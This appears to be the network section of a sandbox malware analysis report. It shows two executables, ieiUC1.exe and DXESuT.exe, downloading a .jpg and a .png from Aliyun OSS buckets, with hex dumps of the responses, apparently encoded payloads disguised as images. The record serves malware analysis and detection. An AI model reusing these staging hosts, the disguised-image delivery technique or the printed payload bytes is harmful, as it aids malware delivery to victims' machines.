                                                                        2025-01-14 04:12:35 UTC4096INData Raw: 15 03 58 89 56 b4 b6 a2 ad 03 9c f1 67 d1 75 f3 e8 19 38 39 86 89 50 71 f6 9c 55 6e f0 3c 79 b6 4b a6 36 b9 b4 a2 ab 24 ae 39 77 96 dd 86 d0 fd 7d 97 cb 0d f0 c5 e3 02 f9 c1 52 24 d9 92 d5 0f ce ba 02 8d 60 9d a4 7e 46 0c f6 07 7e 6e 99 9f b7 49 61 ff 7c c2 1d c4 45 e2 10 ab 9d 5d f3 48 c7 32 f2 49 bd 7e 2c f3 14 b8 55 84 3b b6 cd f2 2c a2 4e c8 2f 6a 5f 90 af 64 33 93 34 22 de 67 0c 00 0a 07 58 6d 1d 91 a5 e8 77 57 3e 92 ad 64 db 25 db 5a a7 9e fb ee 37 1e bf 9f 1c 20 8f 58 83 8e 9c 9d 1a 84 f4 2f e8 b6 e9 fc 5c 14 cf 3d a8 20 c1 36 73 8b 6d ad fa 19 32 a5 19 e7 34 c8 51 2a b2 c7 6f 71 16 6b 1a c9 12 87 4a 5b 13 27 7e 0c 5d 42 3e 1f df 6d a6 94 82 5a 53 5e fd 07 49 a4 e3 fa f2 49 de ae 8b 50 62 d9 cf c2 ba 82 06 00 8f 34 6e 19 e8 d9 e4 90 5c e0 85 6f a3
                                                                        Data Ascii: XVgu89PqUn<yK6$9w}R$`~F~nIa|E]H2I~,U;,N/j_d34"gXmwW>d%Z7 X/\= 6sm24Q*oqkJ['~]B>mZS^IIPb4n\o


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        12192.168.11.2049767118.178.60.94431016C:\Users\user\Documents\ieiUC1.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-14 04:12:48 UTC115OUTGET /FOM-53.jpg HTTP/1.1
                                                                        User-Agent: GetData
                                                                        Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                        Cache-Control: no-cache
                                                                        2025-01-14 04:12:49 UTC548INHTTP/1.1 200 OK
                                                                        Server: AliyunOSS
                                                                        Date: Tue, 14 Jan 2025 04:12:49 GMT
                                                                        Content-Type: image/jpeg
                                                                        Content-Length: 366410
                                                                        Connection: close
                                                                        x-oss-request-id: 6785E4405C00693633EA4158
                                                                        Accept-Ranges: bytes
                                                                        ETag: "DA1D5EB665D3AAD523BE59415E6449ED"
                                                                        Last-Modified: Tue, 22 Oct 2024 14:47:51 GMT
                                                                        x-oss-object-type: Normal
                                                                        x-oss-hash-crc64ecma: 5641369857548672686
                                                                        x-oss-storage-class: Standard
                                                                        x-oss-ec: 0048-00000105
                                                                        Content-Disposition: attachment
                                                                        x-oss-force-download: true
                                                                        Content-MD5: 2h1etmXTqtUjvllBXmRJ7Q==
                                                                        x-oss-server-time: 131
                                                                        2025-01-14 04:12:49 UTC3548INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                                        Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                                        2025-01-14 04:12:49 UTC4096INData Raw: 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0
                                                                        Data Ascii: ```````````````````````````````````````````````````````````````
                                                                        2025-01-14 04:12:49 UTC4096INData Raw: 60 60 60 60 eb 25 68 30 9f 75 d0 14 62 70 e9 25 84 e3 1d 84 60 15 67 52 a0 89 a9 60 60 60 06 67 e5 4c a2 a0 c6 2b ed ac f1 5f b5 0c d4 a2 b0 c6 29 e5 4e 2b f5 44 2b e2 ac 2b a8 2b b1 29 f5 10 8a f0 6d a5 0c b0 6b ad 34 6b b1 a8 b2 1f f5 2c 94 e2 f0 63 18 1f 95 e7 d2 20 09 68 e0 e0 e0 67 e5 5c a1 a0 a0 a0 ca a4 2d e5 5c f0 ca a8 c8 5f 5f a0 a0 2b ed 74 2b f1 e8 f2 5f b5 08 d4 a2 70 e5 a0 15 59 a7 25 b8 61 60 60 60 a7 25 bc 40 df 62 60 a7 25 80 e8 73 60 60 0a 60 0a 60 ed 25 48 f0 ca a0 ca a0 ca ac 2d ed 78 f1 c8 a4 a0 a0 38 2b f5 74 2b e2 e8 f0 5f b5 00 d4 a2 b0 2b ed 34 26 a1 b3 e1 8a e0 8a e0 8a e0 6b b5 34 b2 88 69 f7 e0 f0 8a e0 8a e0 08 da 10 e0 e0 63 24 fc 2b ed 74 29 e1 e4 10 a1 2b 45 fd 62 a8 a0 f5 2b 4c 18 b8 6a a0 a0 48 9a a7 a1 a0 f6 f7 2b e5 a8
                                                                        Data Ascii: ````%h0ubp%`gR```gL+_)N+D+++)mk4k,c hg\-\__+t+_pY%a```%@b`%s````%H-x8+t+_+4&k4ic$+t)+Eb+LjH+
                                                                        2025-01-14 04:12:49 UTC4096INData Raw: ed 2c 9d 9f 9f 31 ed f5 f4 9e 9f 9f 32 88 1d 9d 60 60 e3 a4 70 ed e5 f4 9e 9f 9f 30 ed ed 10 5d 5f 5f f1 5f b5 30 d2 a2 b0 ca a0 c8 20 a0 a0 a0 ca a2 ca a0 ca a2 c8 a0 a0 a0 e0 c8 a0 4c a2 f0 1f f5 74 92 e2 f0 69 65 84 1d 1f 1f 63 5d 84 1d 1f 1f 1f 95 e7 d3 20 09 0a e0 e0 e0 8a e0 6d 35 cc 5d 5f 5f f2 2b e5 a8 f0 48 06 5c a0 a0 23 64 a4 2b ed ac 8b 68 23 49 a1 f1 2b f5 a8 f2 48 f1 9c 60 60 e3 a4 64 eb 2d 68 ed 34 61 61 32 eb e5 04 9d 9f 9f 30 9f 75 f8 12 62 70 eb ed 04 9d 5f 5f f1 5f b5 44 d2 a2 b0 c8 54 a1 a0 a0 5f b5 6c d2 a2 b0 ca a1 c8 8c 4c a2 b0 48 61 5c 5f 5f 63 24 e8 8a e0 88 b8 0c e2 f0 08 dd 1b e0 e0 63 24 e8 63 18 1f 94 d0 8a e0 8a e0 8a e0 6d 75 18 5e 5f 5f f2 c8 24 4c a2 b0 ca a0 5f b5 a0 d3 a2 b0 ca a0 01 68 ec a5 b0 f0 5f b5 3c d2 a2 b0 ca
                                                                        Data Ascii: ,12``p0]___0 Ltiec] m5]__+H\#d+h#I+H``d-h4aa20ubp___DT_lLHa\__c$c$cmu^__$L_h_<
                                                                        2025-01-14 04:12:49 UTC4096INData Raw: 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 44 45 46 47 48 49 4e 4e 4e 4a 4b 4e 8e 8e 8c 8d f5 2b 4c 21 4c 18 a2 a0 a0 29 2d e8 5d 5f 5f c8 ac 4e a2 b0 48 3e a3 a0 a0 23 64 a4 8a e0 88 f4 0e e2 f0 08 d5 0d 1f 1f 63 24 e8 8a e0 88 d0 0e e2 f0 08 c6 0d 1f 1f 63 24 e8 88 08 a3 a0 a0 5f b5 6c d2 a2 b0 c8 e8 4e a2 b0 5f b5 20 d2 a2 b0 c8 c0 4e a2 b0 5f b5 20 d2 a2 b0 c8 88 63 60 60 9f 75 ac 12 62 70 08 64 61 60 60 ed e5 98 9e 9f 9f 30 0a 60 9f 75 e4 12 62 70 a6 e5 24 5e 5f 5f eb 66 25 25 5e 5f 5f e5 66 25 26 5e 5f 5f f2 66 25 27 5e 5f 5f ee 66 25 28 5e 5f 5f a5 26 65 69 1e 1f 1f ac 26 65 6a 1e 1f 1f d3 26 65 6b 1e 1f 1f d2 26 65 6c 1e 1f 1f ce 26 65 6d 5e 5f 5f c4 66 25 2e 5e 5f 5f cc 66 25 2f 5e 5f 5f cc 66 25 30 5e 5f 5f a0 66 25 d4 5e 5f 5f e7
                                                                        Data Ascii: NNNNNNNNNNNNNNNNNNNDEFGHINNNJKN+L!L)-]__NH>#dc$c$_lN_ N_ c``ubpda``0`ubp$^__f%%^__f%&^__f%'^__f%(^__&ei&ej&ek&el&em^__f%.^__f%/^__f%0^__f%^__
                                                                        2025-01-14 04:12:49 UTC4096INData Raw: 9f 75 90 12 62 70 d8 61 60 60 60 8b 62 8b 80 eb 85 3d a3 35 eb 8c e3 8c 08 37 eb 25 68 e9 25 38 66 e5 3c a0 19 b8 a0 a0 a0 93 60 2d dd 3d 53 0b c6 0b 0a ca c4 2b ed 38 f1 2d f5 3c f2 48 92 2f e0 e0 63 24 ec 6d a5 7c b0 6b ed 28 09 e2 f0 b1 88 78 a5 e5 f0 6b b5 78 63 22 84 b2 08 df 1f 5f 5f 23 64 b0 93 60 ff 2b 45 fd 62 a4 a0 f5 2b 4c ca a0 01 68 49 a2 b0 f0 c8 38 e5 a5 b0 2b ed 68 31 88 7a 9f 9f 9f e3 a4 70 53 a0 3d a2 64 60 35 eb 8c 0a 60 c1 60 60 60 70 30 08 60 60 60 70 2b ed a8 f1 48 58 5e 5f 5f 23 64 b0 93 60 fd 62 a4 a0 f5 2b 4c 21 4c 80 a4 a0 a0 f7 c8 cc 4f a2 f0 1f f5 68 92 e2 f0 69 a5 18 d3 20 86 41 6a dd e5 f0 65 20 95 e5 09 a7 e1 e0 e0 d3 29 86 6b ed 2a 9d a5 b0 29 ed 5c 2b f5 5c 61 42 aa 29 f5 50 ca a0 c8 20 a0 a0 a0 ca a4 ca a0 ca a2 c8 a0 a0
                                                                        Data Ascii: ubpa```b=57%h%8f<`-=S+8-<H/c$m|k(xkxc"__#d`+Eb+LhI8+h1zpS=d`5````p0```p+HX^__#d`b+L!LOhi Aje )k*)\+\aB)P
                                                                        2025-01-14 04:12:49 UTC4096INData Raw: 10 61 60 60 eb 25 68 30 ed ed 40 9d 9f 9f 31 88 00 df 60 60 e3 a4 6c a6 e5 f8 9e 9f 9f 60 d9 f9 a0 a0 a0 93 60 2d 1d 39 5e 5f 5f 53 0b c6 0b 0a ca a0 ca a0 ca a2 ca a0 ca a1 c8 a0 a0 a0 e0 6d 75 cc 1e 1f 1f b2 1f f5 74 92 e2 f0 69 65 70 1e 1f 1f 63 5d 70 1e 1f 1f 1f 95 e7 d3 20 09 11 a0 a0 a0 ca a0 2d 25 34 5e 5f 5f f0 2b ed ac 21 49 d0 a1 a0 a0 f1 2b f5 a8 21 62 d0 a1 a0 a0 f2 eb e5 f0 9e 9f 9f 30 9f 75 f8 12 62 70 e5 a0 15 67 53 a0 89 dc 60 60 60 eb ed f0 9e 9f 9f 31 9f b5 a4 ed a5 b0 2d 35 88 5d 5f 5f f2 48 c4 6c a0 a0 23 64 a4 25 60 d4 85 2d 25 88 5d 5f 5f f0 2d 6d cc 1e 1f 1f b1 88 6c 11 e2 f0 6d 75 78 1e 1f 1f b2 1f f5 b4 ad e5 f0 63 24 f0 0b f4 6d 65 cc 5e 5f 5f f0 2d 2d 38 5e 5f 5f f1 5f b5 68 d2 a2 b0 2b 35 84 5d 5f 5f 29 35 bc 5d 5f 5f 23 1d bc
                                                                        Data Ascii: a``%h0@1``l``-9^__Smutiepc]p -%4^__+!I+!b0ubpgS```1-5]__Hl#d%`-%]__-mlmuxc$me^__--8^___h+5]__)5]__#
                                                                        2025-01-14 04:12:49 UTC4096INData Raw: 64 60 ac ac 35 eb 8c 53 a0 c0 4c c6 65 70 e3 80 61 e5 a0 15 6f ea 6d 4c c6 65 70 e0 a9 61 e8 ad 8c 06 a5 b0 fd 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c f5 2b 4c f1 29 ed 5c 2b e5 ac 2a e8 6b b5 1c 68 ea 8a e0 6b ad 1c 08 f5 e2 e0 e0 6b a5 e8 b0 6b ad 1c 08 a9 e1 e0 e0 6b a5 1c 6b 45 fd 62 a8 a0 f5 2b 4c f1 29 ed 5c ca a1 2b ed 5c 48 4f a1 a0 a0 2b 45 fd 63 6c 6c 6c 6c 6c 6c ac ac ac ac ac 35 eb 8c 31 e9 2d 9c ea 25 68 30 0a 61 eb 2d 9c 88 eb 60 60 60 eb 85 3d a2 64 60 6c 6c 6c 6c 6c f5 2b 4c f1 29 ed 5c 2b e5 5c 2b e8 a8 9b ed a8 d7 a5 48 c2 c9 a1 a0 2b ed 5c 48 f1 e1 e0 e0 6b b5 1c 6b a2 e4 e3 a5 e8 6b 05 bd 22 e4 e0 2c 2c b5 6b 0c 63 0c e8 69 ad 1c 6b a5 5c 23 d8 a4 a0 d5 aa 48 c9 a1 a0 a0 29 e5 58 4b a9 2b ed 5c 2b f1 a4 29 f5 58 2b e5 58 2b 45 fd
                                                                        Data Ascii: d`5SLepaomLepacllllllllllllll+L)\+*khkkkkkEb+L)\+\HO+Ecllllll51-%h0a-```=d`lllll+L)\+\+H+\Hkkk",,kcik\#H)XK+\+)X+X+E
                                                                        2025-01-14 04:12:49 UTC4096INData Raw: ea 62 e3 98 1d 15 6a a7 65 0c 94 62 70 60 60 60 60 e3 5d 0c 94 62 70 60 14 41 08 12 74 60 60 5f b5 6c d2 a2 b0 2b 2d 44 5e 5f 5f 48 7c 5c 5f 5f 2b 2d 44 5e 5f 5f 48 ff 5d 5f 5f 2b ed 54 c4 69 ed e0 e0 e0 e0 bf be bb 6b 05 bd 22 e8 e0 2c 2c 2c 2c 2c 2c b5 6b 0c b1 69 ad 1c 6b ad 1c 08 23 5c 5f 5f 2b e5 a8 23 40 a1 25 60 d4 ac 2b ed 5c f1 48 53 3e a0 a0 23 64 a4 2b e5 5c 2b 45 fd a2 64 60 ac ac 35 eb 8c 88 67 60 60 60 88 71 60 60 60 3d a3 35 eb 8c d9 ad 2c 65 70 88 75 3c 61 a0 fd 63 f5 2b 4c c8 f0 d7 a0 b0 48 10 0d a0 a0 23 64 a4 fd 63 f5 2b 4c 19 6d ec a5 b0 48 d3 fd e1 e0 bd 23 b5 6b 0c 08 e7 e0 e0 e0 08 f1 e0 e0 e0 bd 23 b5 6b 0c 59 2c ac e5 f0 08 30 89 e1 e0 fd 63 f5 2b 4c c8 2f d7 a0 b0 48 d1 0d a0 a0 23 64 a4 fd 63 f5 2b 4c 19 6c ec a5 b0 48 90 cb a1
                                                                        Data Ascii: bjebp````]bp`At``_l+-D^__H|\__+-D^__H]__+Tik",,,,,,kik#\__+#@%`+\HS>#d+\+Ed`5g```q```=5,epu<ac+LH#dc+LmH#k#kY,0c+L/H#dc+LlH
                                                                        2025-01-14 04:12:49 UTC4096INData Raw: 60 eb 25 d0 30 9f 75 4c 10 62 70 eb 2d f8 e9 2d e4 eb 35 d0 32 9f 75 84 12 62 70 eb 25 cc 30 5f b5 44 d2 a2 b0 2b ed 24 29 ed 18 4b a7 67 e5 18 a0 a0 a0 a0 23 dd 14 a0 d4 aa 2b f5 14 f2 5f f5 ec 92 e2 f0 6b a5 58 6b 05 bd 23 b5 6b 0c 61 0c 7c e5 e0 e0 88 df 68 e0 f0 88 50 3d e4 f0 1f b5 80 d0 a2 b0 03 54 ed a5 b0 67 a5 58 ed a5 b0 80 a0 a0 a0 67 a5 a0 ee a5 b0 a7 a0 a0 a0 67 a5 64 2e 65 70 60 60 60 60 a7 65 70 2e 65 70 b0 67 60 60 a7 65 6c 2e 65 70 61 60 60 60 a7 65 9c 2d a5 b0 a2 a0 a0 a0 c8 58 ed a5 b0 01 54 ed a5 b0 f0 5f b5 c4 d0 a2 b0 67 a5 ac ee a5 b0 a0 a0 a0 e0 88 14 e1 e0 e0 1f f5 2c 92 e2 f0 27 65 8c 1f 1f 1f 74 e0 e0 e0 6d 6d 8c 1f 1f 1f b1 1f f5 f8 d2 a2 b0 23 1d d0 5f 5f 5f a6 d3 96 67 a5 5c ed a5 b0 a4 a0 a0 a0 c8 58 ed a5 b0 2b b5 54 ed a5
                                                                        Data Ascii: `%0uLbp--52ubp%0_D+$)Kg#+_kXk#ka|hP=TgXggd.ep````ep.epg``el.epa```e-XT_g,'etmm#___g\X+T


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        13192.168.11.2049770118.178.60.1034432236C:\Program Files (x86)\DXESuT\DXESuT.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-14 04:16:07 UTC131OUTGET /extra-task2.png HTTP/1.1
                                                                        User-Agent: Chrome/114.0.0.0
                                                                        Host: upitem.oss-cn-hangzhou.aliyuncs.com
                                                                        Cache-Control: no-cache
                                                                        2025-01-14 04:16:07 UTC548INHTTP/1.1 200 OK
                                                                        Server: AliyunOSS
                                                                        Date: Tue, 14 Jan 2025 04:16:07 GMT
                                                                        Content-Type: image/png
                                                                        Content-Length: 1589824
                                                                        Connection: close
                                                                        x-oss-request-id: 6785E507ECB4DB3836D15D85
                                                                        Accept-Ranges: bytes
                                                                        ETag: "BA024D16008C2932005DB859C94476A8"
                                                                        Last-Modified: Tue, 07 May 2024 13:52:08 GMT
                                                                        x-oss-object-type: Normal
                                                                        x-oss-hash-crc64ecma: 16714771568971376594
                                                                        x-oss-storage-class: Standard
                                                                        x-oss-ec: 0048-00000105
                                                                        Content-Disposition: attachment
                                                                        x-oss-force-download: true
                                                                        Content-MD5: ugJNFgCMKTIAXbhZyUR2qA==
                                                                        x-oss-server-time: 11
                                                                        2025-01-14 04:16:07 UTC3548INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 54 00 00 02 c0 08 06 00 00 00 76 4e 6b 38 00 00 20 00 49 44 41 54 78 9c 9c fd 0b 96 ec ba 0a 2d 0a 8a bc bd a8 46 57 7b aa 2d af 2f 37 e5 a2 42 4a a8 8d 40 ac 73 c6 f9 29 ae 1a 96 f0 c7 c3 4b 00 ce 4e 63 cc f6 6a d8 91 e4 21 90 5c d8 a0 3a 98 21 dc 45 1c 05 ce 4e 7f 01 81 b6 26 e5 3e 00 b5 4d 6e 2a 70 93 f3 af ee b8 74 a1 c9 a0 9e 58 52 06 4c 39 83 94 75 65 f9 b9 74 78 66 41 24 b6 8c fe 7b 34 ca d8 46 76 c3 6a 19 be ba ba d0 ab a1 02 9c 6e cb 3b a5 1f 22 5f be 2c 1f 46 79 be 1d 31 c0 b4 f9 aa b2 c6 86 a2 a8 cf cb f6 4a 6a a2 97 e3 87 21 7c e8 ab cb 4a d3 46 e5 e3 52 39 b5 4c e4 51 79 d8 cc 4b 4b 02 5a dc e8 97 e6 78 79 1b b1 6d 06 2a 64 0e 29 26 25 07 aa c2 19 71 e2 ce 9a 2e 47 cf f2 59 52 8d 23 67
                                                                        Data Ascii: PNGIHDRTvNk8 IDATx-FW{-/7BJ@s)KNcj!\:!EN&>Mn*ptXRL9uetxfA${4Fvjn;"_,Fy1Jj!|JFR9LQyKKZxym*d)&%q.GYR#g
                                                                        2025-01-14 04:16:07 UTC4096INData Raw: 1e db cb 1c cf 5e bb 1e 7a 6e 22 89 71 ae 06 d9 4d 98 64 43 b4 85 be 17 a6 bc 9c cc e2 c7 15 d9 c9 ee c3 3e 92 54 95 eb 78 72 d3 48 71 37 52 e1 74 5b d9 1c 09 12 10 7a 36 c8 48 14 83 a8 51 f3 1f 87 cb 7d 6b 88 74 27 21 cc 63 79 dd 74 4d 73 81 c6 ab 0b 93 8c 52 4a 2b 59 76 53 5a 1f 17 f1 df 6c 72 29 e7 a8 0c e6 fa e3 28 60 31 35 ca 87 d8 92 38 2c 53 03 89 02 a8 e4 83 e0 db de 6d 22 a1 f7 c7 25 45 f0 37 b9 83 60 45 e5 2e 22 f1 c9 c2 06 a4 e0 18 3d ab 53 3e 08 a8 24 fd e5 64 0e ae 92 cb a3 ff c0 d4 09 ab 33 3a 61 f9 61 47 a9 c7 61 5c cd a1 44 c7 62 b0 70 ce 08 65 85 05 4d 9b 21 00 80 27 66 49 40 82 be 7a 3d b7 b6 41 b1 b5 ad bf e7 55 17 b3 75 5f e0 d3 c0 33 1d cb da 42 8d 79 b4 e2 74 2e f2 91 17 b4 26 a2 b7 fc 5c 6d fb d4 a3 b6 5a de 79 b3 79 e8 8a 84 ec 17
                                                                        Data Ascii: ^zn"qMdC>TxrHq7Rt[z6HQ}kt'!cytMsRJ+YvSZlr)(`158,Sm"%E7`E."=S>$d3:aaGa\DbpeM!'fI@z=AUu_3Byt.&\mZyy
                                                                        2025-01-14 04:16:07 UTC4096INData Raw: 02 b9 e7 8d 6e cf 34 1c e8 dd 41 b7 99 31 f3 e0 f1 96 4a 47 d5 1d 35 8b 12 f1 29 84 f0 0e 35 0a 68 f7 c3 b3 10 67 6d 69 06 a5 cd 0d 90 ae 9b 07 3d 99 f6 9a cf 91 1e f4 22 0e 9d 7f f4 21 37 ca c6 41 a0 4d 9c d1 f3 6b 5b e9 32 43 f4 19 4c 6d d5 2a e8 26 20 63 b1 e4 fb 03 bb 6f 48 a1 ba 9f c3 72 b3 69 38 ca 42 cb c4 6b 25 5f 9c 84 63 6c ba a4 2c ff 7b 05 43 93 83 cd a7 c0 ce db 24 1d c7 60 f4 b0 9c e4 eb 02 17 ed 4c e6 97 7c 5b 4a 2c 2e 2b 5c 23 5a 4f 25 23 fc 75 ad e5 a6 b8 f8 ba 4b f8 37 bf dd 2a 18 77 04 fb bf 41 39 82 fb 51 ff 5a e8 17 85 1c 10 1b d2 0e ef 3a a5 82 04 3a 18 96 a3 7a 7c 1e ad 77 13 f1 74 29 77 74 3e 15 80 6a ed 87 d8 ef 8f b7 55 8d c6 82 26 de 80 85 02 c7 9f 11 b5 46 79 00 2b 91 5d c4 d4 07 d0 d7 95 15 2a 80 56 03 06 33 10 78 f0 ac 20 96
                                                                        Data Ascii: n4A1JG5)5hgmi="!7AMk[2CLm*& coHri8Bk%_cl,{C$`L|[J,.+\#ZO%#uK7*wA9QZ::z|wt)wt>jU&Fy+]*V3x
                                                                        2025-01-14 04:16:07 UTC4096INData Raw: 4f a3 03 28 bf 93 69 73 76 0c 11 92 ce b8 6d 44 06 8d aa 02 96 a4 d9 cf 49 89 07 91 81 61 1b 57 f3 14 8c 77 16 74 d1 ac d2 e9 d7 d5 e7 d6 45 79 ed 19 e3 10 ea 58 ac 7d fc 00 03 85 f8 b5 1e 73 26 3f ab 95 6d 6f b0 e1 ba 7a 1c 76 6e 12 90 00 12 e2 3a 2c 6a c3 1c 08 b4 f9 09 8c e0 8f 1e 3a 64 f1 b3 82 2f d4 fa 2f 84 99 fb 4d 72 94 d4 5c 6f b1 66 bc c6 bd 15 39 6f a9 7d 49 d3 ad 25 e1 e7 86 03 e5 e6 12 3c 06 28 22 49 3a 5f a4 f4 c8 bd ac df fb 52 8b 69 cd 8a 89 8e 0f 9f ec 57 c7 55 a6 64 fd be ea 3c b4 cd 56 1e be 3d 5d ef b2 09 95 68 c2 84 cf 5f 2f cd 4d 44 01 c7 dc 9d e7 6c c1 f5 53 6a d4 71 0f 55 39 46 a4 4e 72 61 a2 31 65 a7 6e e6 28 71 aa 55 b4 93 bc fb 9f c5 61 7f e9 36 5f df c2 38 8f 73 4f bf 90 06 ca 80 9e 5d 54 21 7e 3f b9 8d e0 ff ad c9 94 ae a8 3d
                                                                        Data Ascii: O(isvmDIaWwtEyX}s&?mozvn:,j:d//Mr\of9o}I%<("I:_RiWUd<V=]h_/MDlSjqU9FNra1en(qUa6_8sO]T!~?=
                                                                        2025-01-14 04:16:07 UTC4096INData Raw: 83 9f 3b 09 c9 99 25 77 03 b7 f1 0b 1b b0 99 e1 da 02 7d 96 0d c8 ca a5 50 91 51 78 76 c4 ed 7a fc d5 1a 2a 9f 59 8e 63 49 f7 4d 9c e5 1b d8 b9 a7 d0 5f 55 f5 77 4d da f1 d8 79 fd 0a 3d 15 ca 49 04 07 d7 14 cc 91 b1 e7 67 e2 58 8e 2e c8 ff 7d 12 12 ad 25 9d cc e3 18 1c 13 c9 bc 9d 7b 04 4d b9 66 46 04 74 87 95 3d 95 5c e2 3f e9 92 6d cb 93 c0 cf e6 c0 ec 10 9a 35 70 4f f8 55 c8 14 77 7b d8 50 6d fc 41 21 13 f8 a6 56 ac 55 0b 5b 53 c7 61 ec d9 e2 31 c5 cd ae a2 4d d4 b1 ec 6b 30 e2 80 45 a5 5b 76 92 df e5 ed 30 15 0f ea c9 d1 a2 d4 fc 6f a5 bd 66 54 1f a9 f5 74 a0 72 37 19 9e b9 c8 10 de e0 27 e0 d6 1b 6f 3b ab 9f 56 36 44 4d ee e6 2b 52 19 b6 1b 82 60 06 6a 47 eb 43 be c3 0a b7 1f 11 79 2e 15 79 1f 21 9f 07 c0 09 6f d6 d9 e2 87 e0 ce 62 c9 bf bb 6f b6 25
                                                                        Data Ascii: ;%w}PQxvz*YcIM_UwMy=IgX.}%{MfFt=\?m5pOUw{PmA!VU[Sa1Mk0E[v0ofTtr7'o;V6DM+R`jGCy.y!obo%
                                                                        2025-01-14 04:16:07 UTC4096INData Raw: 57 e8 93 95 cc 20 d7 78 af 8b bc 5f b3 cc 64 3b c5 ed 5a 1a 0d 8f 8a 47 1f 95 13 65 37 0f 7a d2 3d b0 1c 85 4f 13 ae 58 28 87 83 d1 27 b3 60 c8 1c 94 4d 05 00 f4 b0 91 55 7a 6a 77 5a 98 ea de 70 ce 7a f4 e7 58 36 5a 0c 4b 85 a6 65 a4 e5 02 81 18 76 b7 44 4e 2d cb 7f 1a 39 42 57 db 60 50 8d 3d 06 d3 70 ea 1f 81 06 a3 49 c2 81 d7 f6 da 59 df ad 3a b8 c0 ae 36 fb 2b a7 65 7b df fa 4f eb 13 37 72 09 de 5e 48 d3 aa d4 21 a5 aa 49 09 90 0f c5 a4 4a ae 32 38 4f 8d 9f 08 0e a0 a3 45 c3 33 9f b9 15 38 2f fc 91 b9 90 fb ac d1 2d 4c e0 1e be d3 b1 54 27 2c 4f 1d 81 df 6d 8b 7b ab 47 3e 42 be 29 ef b4 72 85 5d 78 d0 2f 08 9a d0 07 b7 92 bf f7 db 5b 49 5d fc 9d 76 38 6f 4f dd 7d 0f 2e 05 f5 de 2d da c9 5d 03 aa d2 ed 13 64 68 87 78 4b 33 c9 4e 13 27 d9 26 15 ca f8 29
                                                                        Data Ascii: W x_d;ZGe7z=OX('`MUzjwZpzX6ZKevDN-9BW`P=pIY:6+e{O7r^H!IJ28OE38/-LT',Om{G>B)r]x/[I]v8oO}.-]dhxK3N'&)
                                                                        2025-01-14 04:16:07 UTC4096INData Raw: c9 9c 50 a9 06 eb d5 7e 85 ac 29 f4 fc 25 bb b2 0f 71 e5 bc cd af 05 b5 07 27 1e 5d 28 3d 11 df e5 93 3b 0b 2a 57 45 7f 4a 5f 12 7f bd 32 0c 19 94 66 40 26 fe ec f4 06 a0 a0 42 1e d3 09 f2 c5 d0 b5 b7 f6 7e 4e fb 34 01 81 79 e7 63 89 5b 3b 98 d3 4c a6 4f 28 11 7a a8 5e 34 e4 59 b7 2e e6 86 4a 3a 8c d4 b0 a8 f8 cd 91 b6 3e a3 30 b4 e2 16 26 e3 11 05 42 0c cf 1a a8 12 de 88 6f 67 1c 28 07 c3 03 bf 1d 53 51 70 12 a7 e9 c0 ab d5 e6 72 6c 27 4c 8a e6 b5 13 74 3d 14 21 1d b3 43 6a fe d1 bd 23 2d dc 77 33 80 53 c6 09 d3 7a 89 ca d2 e1 41 d6 0b c9 ec d4 c9 1d b9 a3 ff 38 5c 2d 21 1c 2e 48 bd ed f9 ae 7e a7 b2 6d e9 bd 11 d1 59 b5 a3 f0 6e 18 95 b4 60 16 75 88 0d c0 7f 54 38 fa 2e 78 58 40 37 81 7c 7a f5 c9 23 60 6a 57 48 22 06 91 63 64 53 e8 8c 45 02 7d c7 bd 16
